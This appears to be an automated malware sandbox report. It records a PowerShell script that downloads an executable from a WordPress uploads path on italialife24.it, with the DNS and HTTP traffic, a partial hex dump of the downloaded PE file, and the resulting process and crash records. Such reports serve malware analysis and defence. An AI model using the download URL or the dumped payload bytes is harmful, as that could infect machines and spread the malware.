                                        Dec 3, 2024 09:16:59.877562046 CET5272853192.168.2.91.1.1.1
                                        Dec 3, 2024 09:17:00.016295910 CET53527281.1.1.1192.168.2.9
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 3, 2024 09:16:59.877562046 CET192.168.2.91.1.1.10xa278Standard query (0)www.italialife24.itA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Dec 3, 2024 09:16:55.239577055 CET1.1.1.1192.168.2.90xb26bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                        Dec 3, 2024 09:16:55.239577055 CET1.1.1.1192.168.2.90xb26bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                        Dec 3, 2024 09:17:00.016295910 CET1.1.1.1192.168.2.90xa278No error (0)www.italialife24.ititalialife24.itCNAME (Canonical name)IN (0x0001)false
                                        Dec 3, 2024 09:17:00.016295910 CET1.1.1.1192.168.2.90xa278No error (0)italialife24.it46.254.34.201A (IP address)IN (0x0001)false
                                        • www.italialife24.it
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.94971246.254.34.2014437648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-03 08:17:01 UTC214OUTGET /wp-content/uploads/2021/05/hypervitalizationVA.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: www.italialife24.it
                                        Connection: Keep-Alive
                                        2024-12-03 08:17:02 UTC419INHTTP/1.1 200 OK
                                        Date: Tue, 03 Dec 2024 08:17:02 GMT
                                        Server: Apache
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Last-Modified: Tue, 26 Nov 2024 14:07:43 GMT
                                        ETag: "2f600-627d15f7d3176"
                                        Accept-Ranges: bytes
                                        Content-Length: 194048
                                        Cache-Control: max-age=31536000
                                        Expires: Wed, 03 Dec 2025 08:17:02 GMT
                                        Vary: Accept-Encoding
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Content-Type: application/x-msdownload
                                        2024-12-03 08:17:02 UTC7773INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 61 4e 60 2b 00 20 33 2b 00 20 33 2b 00 20 33 60 78 23 32 21 00 20 33 60 78 25 32 a5 00 20 33 60 78 24 32 3f 00 20 33 e9 81 24 32 39 00 20 33 e9 81 23 32 3f 00 20 33 e9 81 25 32 02 00 20 33 60 78 21 32 2c 00 20 33 2b 00 21 33 41 00 20 33 d8 82 29 32 2a 00 20 33 d8 82 df 33 2a 00 20 33 2b 00 b7 33 2a 00 20 33 d8 82 22 32 2a 00 20 33 52 69 63 68 2b 00 20 33 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$oaN`+ 3+ 3+ 3`x#2! 3`x%2 3`x$2? 3$29 3#2? 3%2 3`x!2, 3+!3A 3)2* 33* 3+3* 3"2* 3Rich+ 3
                                        2024-12-03 08:17:02 UTC8000INData Raw: 89 0d 00 00 00 00 59 8b 4d f0 33 cd e8 96 1c 00 00 8b e5 5d c2 24 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8d 4d 1c e8 31 12 00 00 8b e5 5d c2 34 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 55 1d 41 00 64 a1 00 00 00 00 50 83 ec 68 a1 00 b0 41 00 33 c5 89 45 f0 50 8d 45 f4 64 a3 00 00 00 00 89 4d 98 c7 45 94 46 02 00 00 68 50 80 41 00 8d 4d a8 e8 01 12 00 00 c7 45 fc 00 00 00 00 68 a4 80 41 00 8d 4d c0 e8 ed 11 00 00 c6 45 fc 01 68 b8 80 41 00 8d 4d d8 e8 dc 11 00 00 f2 0f 10 05 e8 88 41 00 f2 0f 11 45 8c c6 45 a7 01 b8 01 00 00 00 85 c0 74 1c c7 45 a0 19 00 00 00 eb 09 8b 4d a0 83 e9 01 89 4d a0 83 7d a0 00 7e 04 eb ef eb ed c7 45 9c 92 17 00 00 8d 4d d8 e8 77 11 00 00 c6 45 fc 00 8d 4d c0 e8 6b 11 00 00 c7 45 fc ff ff ff ff
                                        Data Ascii: YM3]$UQMM1]4UjhUAdPhA3EPEdMEFhPAMEhAMEhAMAEEtEMM}~EMwEMkE
                                        2024-12-03 08:17:02 UTC8000INData Raw: c3 6a 07 e8 e4 04 00 00 56 e8 29 3b 00 00 ff 75 e0 e8 e5 3a 00 00 cc e8 04 04 00 00 e9 7a fe ff ff 55 8b ec 6a 00 ff 15 5c 30 41 00 ff 75 08 ff 15 58 30 41 00 68 09 04 00 c0 ff 15 0c 30 41 00 50 ff 15 14 30 41 00 5d c3 55 8b ec 81 ec 24 03 00 00 6a 17 ff 15 60 30 41 00 85 c0 74 05 6a 02 59 cd 29 a3 b8 ba 41 00 89 0d b4 ba 41 00 89 15 b0 ba 41 00 89 1d ac ba 41 00 89 35 a8 ba 41 00 89 3d a4 ba 41 00 66 8c 15 d0 ba 41 00 66 8c 0d c4 ba 41 00 66 8c 1d a0 ba 41 00 66 8c 05 9c ba 41 00 66 8c 25 98 ba 41 00 66 8c 2d 94 ba 41 00 9c 8f 05 c8 ba 41 00 8b 45 00 a3 bc ba 41 00 8b 45 04 a3 c0 ba 41 00 8d 45 08 a3 cc ba 41 00 8b 85 dc fc ff ff c7 05 08 ba 41 00 01 00 01 00 a1 c0 ba 41 00 a3 c4 b9 41 00 c7 05 b8 b9 41 00 09 04 00 c0 c7 05 bc b9 41 00 01 00 00 00 c7 05
                                        Data Ascii: jV);u:zUj\0AuX0Ah0AP0A]U$j`0AtjY)AAAA5A=AfAfAfAfAf%Af-AAEAEAEAAAAAA
                                        2024-12-03 08:17:02 UTC8000INData Raw: 06 00 00 e8 01 f4 ff ff 8b 4d 08 6a 00 6a 00 89 48 1c e8 00 f0 ff ff e8 86 22 00 00 cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 00 81 38 63 73 6d e0 75 36 83 78 10 03 75 30 81 78 14 20 05 93 19 74 12 81 78 14 21 05 93 19 74 09 81 78 14 22 05 93 19 75 15 83 78 1c 00 75 0f e8 ab f3 ff ff 33 c9 41 89 48 20 8b c1 5d c3 33 c0 5d c3 55 8b ec 6a ff ff 75 10 ff 75 0c ff 75 08 e8 05 00 00 00 83 c4 10 5d c3 6a 10 68 18 97 41 00 e8 73 e7 ff ff ff 75 10 ff 75 0c ff 75 08 e8 35 06 00 00 83 c4 0c 8b f0 89 75 e4 e8 5e f3 ff ff ff 40 18 83 65 fc 00 3b 75 14 74 68 83 fe ff 0f 8e a6 00 00 00 8b 7d 10 3b 77 04 0f 8d 9a 00 00 00 8b 47 08 8b 0c f0 89 4d e0 c7 45 fc 01 00 00 00 83 7c f0 04 00 74 30 51 57 ff 75 08 e8 03 06 00 00 83 c4 0c 68 03 01 00 00 ff 75 08 8b 47 08 ff 74 f0 04
                                        Data Ascii: MjjH"UE8csmu6xu0x tx!tx"uxu3AH ]3]Ujuuu]jhAsuuu5u^@e;uth};wGME|t0QWuhuGt
                                        2024-12-03 08:17:02 UTC8000INData Raw: 8b ff 55 8b ec 83 ec 14 53 8b d9 57 89 5d ec 8b 03 8b 38 85 ff 75 08 83 c8 ff e9 b7 00 00 00 8b 15 00 b0 41 00 8b ca 56 8b 37 83 e1 1f 8b 7f 04 33 f2 33 fa d3 ce d3 cf 85 f6 0f 84 93 00 00 00 83 fe ff 0f 84 8a 00 00 00 89 55 fc 89 7d f4 89 75 f8 83 ef 04 3b fe 72 54 8b 07 3b 45 fc 74 f2 33 c2 8b 55 fc d3 c8 8b c8 89 17 89 45 f0 ff 15 20 31 41 00 ff 55 f0 8b 03 8b 15 00 b0 41 00 8b ca 83 e1 1f 8b 00 8b 18 8b 40 04 33 da d3 cb 33 c2 d3 c8 3b 5d f8 89 5d f0 8b 5d ec 75 05 3b 45 f4 74 af 8b 75 f0 8b f8 89 45 f4 eb a2 83 fe ff 74 0d 56 e8 6d 04 00 00 8b 15 00 b0 41 00 59 8b 03 8b 00 89 10 8b 03 8b 00 89 50 04 8b 03 8b 00 89 50 08 33 c0 5e 5f 5b c9 c3 8b ff 55 8b ec ff 75 08 68 10 c0 41 00 e8 6b 00 00 00 59 59 5d c3 6a 10 b8 b1 20 41 00 e8 cc 79 00 00 8d 45 08
                                        Data Ascii: USW]8uAV733U}u;rT;Et3UE 1AUA@33;]]]u;EtuEtVmAYPP3^_[UuhAkYY]j AyE
                                        2024-12-03 08:17:02 UTC8000INData Raw: 67 0d f8 89 1f 8d 7f 38 89 5f cc 8d 47 e0 c7 47 d0 00 00 0a 0a c6 47 d4 0a 89 5f d6 88 5f da 3b c6 75 c9 8b 75 f8 5f 53 e8 b8 e5 ff ff 59 8b c6 5e 5b c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 74 25 53 8d 9e 00 0e 00 00 57 8b fe 3b f3 74 0e 57 ff 15 98 30 41 00 83 c7 38 3b fb 75 f2 56 e8 82 e5 ff ff 59 5f 5b 5e 5d c3 6a 10 68 60 9a 41 00 e8 0e a9 ff ff 81 7d 08 00 20 00 00 72 21 e8 6a ee ff ff 6a 09 5e 89 30 e8 dd d0 ff ff 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 33 f6 89 75 e4 6a 07 e8 2c ec ff ff 59 89 75 fc 8b fe a1 b8 c3 41 00 89 7d e0 39 45 08 7c 1f 39 34 bd b8 c1 41 00 75 31 e8 ed fe ff ff 89 04 bd b8 c1 41 00 85 c0 75 14 6a 0c 5e 89 75 e4 c7 45 fc fe ff ff ff e8 15 00 00 00 eb a2 a1 b8 c3 41 00 83 c0 40 a3 b8 c3 41 00 47 eb bb 8b 75 e4 6a
                                        Data Ascii: g8_GGG__;uu_SY^[UVut%SW;tW0A8;uVY_[^]jh`A} r!jj^0MdY_^[3uj,YuA}9E|94Au1Auj^uEA@AGuj
                                        2024-12-03 08:17:02 UTC8000INData Raw: 8b 9d f8 fe ff ff 8b 8d 08 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 f0 fe ff ff 89 8d 08 ff ff ff 3b ce 0f 87 60 ff ff ff e9 79 03 00 00 d1 e8 8b cb 0f af c7 89 85 04 ff ff ff 8d 3c 30 57 56 89 bd ec fe ff ff ff 15 20 31 41 00 ff d3 8b b5 00 ff ff ff 83 c4 08 85 c0 8b 85 fc fe ff ff 7e 4d 89 b5 f4 fe ff ff 89 bd f0 fe ff ff 3b c7 74 3d 8b 9d f4 fe ff ff 8b f7 8b bd 04 ff ff ff eb 03 8d 49 00 8a 06 8b d6 2b d7 8a 0a 88 02 88 0e 46 83 eb 01 75 ee 8b bd ec fe ff ff 8b 9d f8 fe ff ff 8b b5 00 ff ff ff 8b 85 fc fe ff ff ff b5 08 ff ff ff 8b cb 50 ff 15 20 31 41 00 ff d3 8b 95 08 ff ff ff 83 c4 08 85 c0 7e 49 8b 85 fc fe ff ff 89 b5 ec fe ff ff 8b f2 3b c2 74 37 8b 9d ec fe ff ff 2b c2 89 85 f0 fe ff ff 8b d0 8d 9b 00 00 00 00 8a 06 8d 76 01 8a 4c 32 ff 88 44 32
                                        Data Ascii: +;`y<0WV 1A~M;t=I+FuP 1A~I;t7+vL2D2
                                        2024-12-03 08:17:02 UTC8000INData Raw: 45 e0 eb 25 8a 1f 47 40 88 5d ee 89 45 e0 8a e3 8a 5d ef 8a c4 24 c0 3c 80 75 30 0f b6 c4 83 e0 3f c1 e2 06 0b d0 8b 45 e0 3b c1 72 d7 8b 7d dc 3b cf 73 1c 0f b6 c7 2a d9 66 89 46 04 0f b6 c3 89 16 66 89 46 06 e9 0e ff ff ff ff 75 e4 eb 4f 81 fa 00 d8 00 00 72 08 81 fa ff df 00 00 76 eb 81 fa ff ff 10 00 77 e3 0f b6 c7 c7 45 f0 80 00 00 00 c7 45 f4 00 08 00 00 c7 45 f8 00 00 01 00 3b 54 85 e8 72 c5 8b 4d e8 85 c9 74 02 89 11 f7 da 56 1b d2 23 d7 52 e8 33 fe ff ff eb 07 51 56 e8 3e fe ff ff 59 59 8b 4d fc 5f 5e 33 cd 5b e8 73 60 ff ff c9 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 57 56 53 8b 4d 10 0b c9 74 4d 8b 75 08 8b 7d 0c b7 41 b3 5a b6 20 8d 49 00 8a 26 0a e4 8a 07 74 27 0a c0 74 23 83 c6 01 83 c7 01 3a e7 72 06 3a e3 77 02 02 e6 3a c7 72 06
                                        Data Ascii: E%G@]E]$<u0?E;r};s*fFfFuOrvwEEE;TrMtV#R3QV>YYM_^3[s`UWVSMtMu}AZ I&t't#:r:w:r
                                        2024-12-03 08:17:02 UTC8000INData Raw: 42 08 0f 84 87 00 00 00 0f b6 c8 0f b6 42 08 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 55 07 00 00 0f b6 4e 09 0f b6 42 09 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 33 07 00 00 0f b6 4e 0a 0f b6 42 0a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 11 07 00 00 0f b6 4e 0b 0f b6 42 0b 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 ef 06 00 00 8b 46 0c 3b 42 0c 0f 84 87 00 00 00 0f b6 c8 0f b6 42 0c 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c2 06 00 00 0f b6 4e 0d 0f b6 42 0d 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 a0 06 00 00 0f b6 4e 0e 0f b6 42 0e 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 7e 06 00
                                        Data Ascii: BB+t3EUNB+t3E3NB+t3ENB+t3EF;BB+t3ENB+t3ENB+t3E~
                                        2024-12-03 08:17:02 UTC8000INData Raw: 00 00 00 18 36 41 00 0b 00 00 00 24 36 41 00 09 00 00 00 64 7d 41 00 00 00 00 00 30 36 41 00 04 00 00 00 38 36 41 00 07 00 00 00 40 36 41 00 01 00 00 00 44 36 41 00 02 00 00 00 48 36 41 00 02 00 00 00 4c 36 41 00 01 00 00 00 50 36 41 00 02 00 00 00 54 36 41 00 02 00 00 00 58 36 41 00 02 00 00 00 5c 36 41 00 08 00 00 00 68 36 41 00 02 00 00 00 6c 36 41 00 01 00 00 00 70 36 41 00 02 00 00 00 74 36 41 00 02 00 00 00 78 36 41 00 01 00 00 00 7c 36 41 00 01 00 00 00 80 36 41 00 01 00 00 00 84 36 41 00 03 00 00 00 88 36 41 00 01 00 00 00 8c 36 41 00 01 00 00 00 90 36 41 00 01 00 00 00 94 36 41 00 02 00 00 00 98 36 41 00 01 00 00 00 9c 36 41 00 02 00 00 00 a0 36 41 00 01 00 00 00 a4 36 41 00 02 00 00 00 a8 36 41 00 01 00 00 00 ac 36 41 00 01 00 00 00 b0 36 41 00
                                        Data Ascii: 6A$6Ad}A06A86A@6AD6AH6AL6AP6AT6AX6A\6Ah6Al6Ap6At6Ax6A|6A6A6A6A6A6A6A6A6A6A6A6A6A6A


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:03:16:56
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\untrippingvT.ps1"
                                        Imagebase:0x7ff760310000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:03:16:56
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff70f010000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:17:03
                                        Start date:03/12/2024
                                        Path:C:\Windows\System32\WerFault.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7648 -s 1976
                                        Imagebase:0x7ff64bde0000
                                        File size:570'736 bytes
                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:0.7%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:3
                                          Total number of Limit Nodes:0
                                          execution_graph 3820 7ff887d3c878 3821 7ff887d3c881 CreateThread 3820->3821 3823 7ff887d3c953 3821->3823

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1522266495.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff887d30000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: ec90e329cff9bd11e9f5653be8a3865551a0b6892b044f49f1a7fdfaa20ab2f5
                                          • Instruction ID: a16b7c371f786c489e07f0c046d5b3ea575bbd9f0383051aa4a543d6fd0c393c
                                          • Opcode Fuzzy Hash: ec90e329cff9bd11e9f5653be8a3865551a0b6892b044f49f1a7fdfaa20ab2f5
                                          • Instruction Fuzzy Hash: F5311A3191CB4D4FEB1CEB5898066EDBBE0FB55321F04426FE04EC3192DA74A8428BC2